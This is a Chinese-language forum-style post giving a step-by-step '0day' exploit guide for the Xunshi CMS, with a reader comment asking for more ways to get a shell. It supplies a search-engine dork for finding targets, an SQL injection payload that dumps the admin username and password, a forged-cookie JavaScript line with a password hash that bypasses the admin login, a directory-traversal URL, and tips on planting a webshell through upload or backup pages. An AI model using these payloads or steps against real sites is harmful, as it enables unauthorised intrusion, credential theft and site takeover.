訊時系統(tǒng)(xuas)最新通殺漏洞0day圖文說明
google關(guān)鍵字:inurl:news_more.asp?lm2= (關(guān)鍵字很多的自己定義吧)
1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下語句
2、有時1顯示錯誤信息的時候繼續(xù)往后退2,3,4,我退到11才找到了頁面,郁悶!

3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

爆出管理員帳號和密碼了

4、cookies進后臺
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

5、后臺用了cookie驗證,直接訪問http://www.dxggw.cn/admin/admin_index.asp就OK了!

6、后臺有上傳和備份取SHELL不難。
7、訊時還有個列目錄漏洞:http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..
逍遙復(fù)仇:我搞了一個訊時cms4.1版本的沒有數(shù)據(jù)庫備份不知道怎么搞SHELL,有的說雖然后臺顯示但備份頁面是存在的,登錄后臺后訪問 http://www.xx.com/admin/admin_db_backup.asp?action=BackupData,我這個沒有,郁悶著呢,誰還有其他辦法提供一下,謝謝!
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
關(guān)注官方微信